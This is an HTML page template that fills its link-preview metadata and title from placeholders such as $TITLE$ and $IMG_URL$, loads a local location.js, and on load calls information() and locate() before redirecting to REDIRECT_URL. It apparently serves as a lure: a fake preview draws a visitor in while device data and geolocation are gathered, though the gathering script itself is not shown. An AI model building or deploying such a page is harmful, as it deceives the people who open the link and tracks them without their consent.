<!DOCTYPE html>
<html lang="en">
<head>
	<meta property="og:title" content="$TITLE$">
	<meta property="og:site_name" content="$SITE_NAME$">
	<meta property="og:description" content="$DESCRIPTION$">
	<meta property="og:image" content="$IMG_URL$">
	<title>$TITLE$</title>
	<script type="text/javascript">
    	if (window.location.protocol == "http:") {
        	var restOfUrl = window.location.href.substr(5);
        	window.location = "https:" + restOfUrl;
    	}
    </script>
    <script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.4.1/jquery.min.js"></script>
	<script type="text/javascript" src="js/location.js"></script>
</head>
<body onload="information();locate(function(){window.location='REDIRECT_URL';}, function(){$('#change').html('Failed');});">
</body>
</html>